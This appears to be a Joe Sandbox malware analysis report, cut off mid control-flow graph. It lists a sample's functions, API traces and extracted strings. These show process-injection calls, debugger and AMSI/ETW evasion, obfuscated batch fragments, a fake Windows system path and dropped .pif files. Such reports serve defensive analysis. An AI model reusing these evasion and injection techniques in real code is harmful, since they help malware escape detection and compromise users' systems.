                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029D7A27
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                        • API String ID: 4072585319-445027087
                                                                                                                        • Opcode ID: e4e0208da2761051a554a90539363332e83867c0a46f80b57629859e28ddde44
                                                                                                                        • Instruction ID: 69061aea6b4fbb9399714d981e01e82cbb34028db94c1cac4ff0828ca29f7767
                                                                                                                        • Opcode Fuzzy Hash: e4e0208da2761051a554a90539363332e83867c0a46f80b57629859e28ddde44
                                                                                                                        • Instruction Fuzzy Hash: DC115B75700208AFEB10EFA4DC51FEEB7AEEB88710F918865B904D7640DA30EA159B61
                                                                                                                        Function 029D8254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D82C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                        • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                        • API String ID: 2521977463-737317276
                                                                                                                        • Opcode ID: 54fcd36aa9a9f95e45c824ffdd6d453e2f5bebd0fe271c621ed3000b40dfa85c
                                                                                                                        • Instruction ID: 52a3d828e0b9eff4bd1b50056a64c6fe2d8f115b5b0c71b0a648e81558286344
                                                                                                                        • Opcode Fuzzy Hash: 54fcd36aa9a9f95e45c824ffdd6d453e2f5bebd0fe271c621ed3000b40dfa85c
                                                                                                                        • Instruction Fuzzy Hash: C0012D75740208AFEB50EFA8D851FAE77EEEB8C700F518464F908D7641DA30E9159B25
                                                                                                                        Function 029D7D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D7D74
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                        • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                        • API String ID: 2719805696-3542721025
                                                                                                                        • Opcode ID: 144e8882b562cb8b8ee7cc6e0b8e93be3fab4e47329f48487bd85724094feadb
                                                                                                                        • Instruction ID: 86a98646230045303fd3ceed22b930650eba9c036298dcd4117b60c9fb813505
                                                                                                                        • Opcode Fuzzy Hash: 144e8882b562cb8b8ee7cc6e0b8e93be3fab4e47329f48487bd85724094feadb
                                                                                                                        • Instruction Fuzzy Hash: 3B012D75600208AFEB10EFA8D851EAEB7FEEB88700F918455B908D7680DA30E9159B65
                                                                                                                        Function 029D84C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029D8090,?,?,00000000,?,029D7A06,ntdll,00000000,00000000,029D7A4B,?,?,00000000), ref: 029D805E
                                                                                                                          • Part of subcall function 029D8020: GetModuleHandleA.KERNELBASE(?), ref: 029D8072
                                                                                                                          • Part of subcall function 029D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029D8150,?,?,00000000,00000000,?,029D8069,00000000,KernelBASE,00000000,00000000,029D8090), ref: 029D8115
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029D811B
                                                                                                                          • Part of subcall function 029D80C8: GetProcAddress.KERNEL32(?,?), ref: 029D812D
                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 029D8529
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                        • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                        • API String ID: 3503870465-2520021413
                                                                                                                        • Opcode ID: 7ffb433d41d151d9f14cc9a663fb521014125c88c9b8e1d22c9cced204386eeb
                                                                                                                        • Instruction ID: c58d55124a772a26619c8960f4c65a9198148c78f445aba6cbc3b74e4e94aed5
                                                                                                                        • Opcode Fuzzy Hash: 7ffb433d41d151d9f14cc9a663fb521014125c88c9b8e1d22c9cced204386eeb
                                                                                                                        • Instruction Fuzzy Hash: 55014474740204AFEB10EFA8D851F5D77EFFB89710F9188A4B40497641DA30A9169A21
                                                                                                                        Function 029DD9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 029DDA6C
                                                                                                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDABE), ref: 029DDA82
                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 029DDAA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFileInitStringUnicode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559453722-0
                                                                                                                        • Opcode ID: 7eee7d3e49dc52cb6b7718711e098ec918dfc0ecdf357e31dfe33d6a353c2fc6
                                                                                                                        • Instruction ID: f3d07ebbd82ce3bb7861141b6d59c12ed772525bb373be135a4308acc760defb
                                                                                                                        • Opcode Fuzzy Hash: 7eee7d3e49dc52cb6b7718711e098ec918dfc0ecdf357e31dfe33d6a353c2fc6
                                                                                                                        • Instruction Fuzzy Hash: 16016D76A48348BEEB05EBA0CD41BDD77BDAB84704F61C0A2A204F7081DB74AB049B75
                                                                                                                        Function 029DDA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029C4ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 029C4EDA
                                                                                                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 029DDA6C
                                                                                                                        • RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDABE), ref: 029DDA82
                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 029DDAA1
                                                                                                                          • Part of subcall function 029C4C0C: SysFreeString.OLEAUT32(029DE950), ref: 029C4C1A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2841551397-0
                                                                                                                        • Opcode ID: 2b708d7cb9241435099c3b0dc9de6e3759e72eaaff947fe2ba7f8352487213d0
                                                                                                                        • Instruction ID: f76fefb97e0088a1c2ac25e13cede967f1e373f1db4854aa3d058d7e7008b687
                                                                                                                        • Opcode Fuzzy Hash: 2b708d7cb9241435099c3b0dc9de6e3759e72eaaff947fe2ba7f8352487213d0
                                                                                                                        • Instruction Fuzzy Hash: 5701F476A4420CBADB11EBE4CD51FDEB3BDEB88700F618461A504F2180EB746B049A75
                                                                                                                        Function 029D6D50 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 029D6CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,029D6D41,?,?,?,00000000), ref: 029D6D21
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,029D6E34,00000000,00000000,029D6DB3,?,00000000,029D6E23), ref: 029D6D9F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFromInstanceProg
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2151042543-0
                                                                                                                        • Opcode ID: a1a14b51776c09cda0b4036adcd8ebe7673f5a1c1e9daa4e81d738e899370bc5
                                                                                                                        • Instruction ID: d94025f2a52248117cad974a70e50054c00c6404de3c9eb38f5e80db0e786699
                                                                                                                        • Opcode Fuzzy Hash: a1a14b51776c09cda0b4036adcd8ebe7673f5a1c1e9daa4e81d738e899370bc5
                                                                                                                        • Instruction Fuzzy Hash: 6F01F771208704AEE705DF74EC5286B7BADEBC9B10B628839F901D2680E6309A10D971
                                                                                                                        Function 029DEC74 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InetIsOffline.URL(00000000,00000000,029EAFA1,?,?,?,000002F7,00000000,00000000), ref: 029DECAE
                                                                                                                          • Part of subcall function 029D8824: LoadLibraryA.KERNEL32(00000000,00000000,029D890B), ref: 029D8858
                                                                                                                          • Part of subcall function 029D8824: FreeLibrary.KERNEL32(74B10000,00000000,02A21388,Function_000065D8,00000004,02A21398,02A21388,05F5E0FF,00000040,02A2139C,74B10000,00000000,00000000,00000000,00000000,029D890B), ref: 029D88EB
                                                                                                                          • Part of subcall function 029DEB94: GetModuleHandleW.KERNEL32(KernelBase,?,029DEF98,UacInitialize,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,Initialize), ref: 029DEB9A
                                                                                                                          • Part of subcall function 029DEB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 029DEBAC
                                                                                                                          • Part of subcall function 029DEBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 029DEC00
                                                                                                                          • Part of subcall function 029DEBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 029DEC12
                                                                                                                          • Part of subcall function 029DEBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 029DEC29
                                                                                                                          • Part of subcall function 029C7E18: GetFileAttributesA.KERNEL32(00000000,?,029DF8CC,ScanString,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,UacScan,02A2137C,029EAFD8,UacInitialize), ref: 029C7E23
                                                                                                                          • Part of subcall function 029CC2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B158C8,?,029DFBFE,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession), ref: 029CC303
                                                                                                                          • Part of subcall function 029DDBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDC80), ref: 029DDBEB
                                                                                                                          • Part of subcall function 029DDBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,029DDC80), ref: 029DDC1B
                                                                                                                          • Part of subcall function 029DDBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 029DDC30
                                                                                                                          • Part of subcall function 029DDBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 029DDC5C
                                                                                                                          • Part of subcall function 029DDBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 029DDC65
                                                                                                                          • Part of subcall function 029C7E3C: GetFileAttributesA.KERNEL32(00000000,?,029E2A49,ScanString,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,Initialize), ref: 029C7E47
                                                                                                                          • Part of subcall function 029C7FD0: CreateDirectoryA.KERNEL32(00000000,00000000,?,029E2BE7,OpenSession,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8,Initialize,02A2137C,029EAFD8,ScanString,02A2137C,029EAFD8), ref: 029C7FDD
                                                                                                                          • Part of subcall function 029DDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDB9E), ref: 029DDB0B
                                                                                                                          • Part of subcall function 029DDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 029DDB45
                                                                                                                          • Part of subcall function 029DDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 029DDB72
                                                                                                                          • Part of subcall function 029DDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 029DDB7B
                                                                                                                          • Part of subcall function 029D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize,02A213A4,029DA77C,UacScan), ref: 029D87B4
                                                                                                                          • Part of subcall function 029D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029D87CE
                                                                                                                          • Part of subcall function 029D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000860,00000000,02A213A4,029DA3C7,ScanString,02A213A4,029DA77C,ScanBuffer,02A213A4,029DA77C,Initialize), ref: 029D880A
                                                                                                                          • Part of subcall function 029D870C: LoadLibraryW.KERNEL32(amsi), ref: 029D8715
                                                                                                                          • Part of subcall function 029D870C: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 029D8774
                                                                                                                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,ScanBuffer,02A2137C,029EAFD8,OpenSession,02A2137C,029EAFD8,029EB330), ref: 029E49B7
                                                                                                                          • Part of subcall function 029DDA44: RtlInitUnicodeString.NTDLL(?,?), ref: 029DDA6C
                                                                                                                          • Part of subcall function 029DDA44: RtlDosPa.N(00000000,?,00000000,00000000,00000000,029DDABE), ref: 029DDA82
                                                                                                                          • Part of subcall function 029DDA44: NtDeleteFile.NTDLL(?), ref: 029DDAA1
                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 029E4BB7
                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 029E4C0D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2246694967.00000000029C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2246632859.00000000029C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.00000000029ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2246904499.0000000002A1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002A21000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B15000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2247454807.0000000002B18000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_29c0000_D.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                        • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                        • API String ID: 3130226682-181751239
                                                                                                                        • Opcode ID: 49e12002b40ca4a8ebb653961ecdfdd1a47d6deb696294147715558f6b1d4028
                                                                                                                        • Instruction ID: bc84136ce5bb2b9aa3d6b67c942e6e2dc5d649c4ce5d776b8e49dcb0430619d7
                                                                                                                        • Opcode Fuzzy Hash: 49e12002b40ca4a8ebb653961ecdfdd1a47d6deb696294147715558f6b1d4028
                                                                                                                        • Instruction Fuzzy Hash: 4F24F675B501688BDF11EB64CDA0ADD73B6BFC9310F6054EAE009A7254DA30EF868F52
                                                                                                                        Function 029E7878 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771processthreadCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 5348 29e7878-29e7c67 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c4898 5463 29e7c6d-29e7e40 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c4798 call 29c494c call 29c4d20 call 29c4d9c CreateProcessAsUserW 5348->5463 5464 29e8af1-29e8c74 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c4898 5348->5464 5572 29e7ebe-29e7fc9 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 5463->5572 5573 29e7e42-29e7eb9 call 29c480c call 29c494c call 29c46a4 call 29c4798 call 29c494c call 29c46a4 call 29d8824 5463->5573 5553 29e8c7a-29e8c89 call 29c4898 5464->5553 5554 29e9420-29eaa25 call 29c480c call 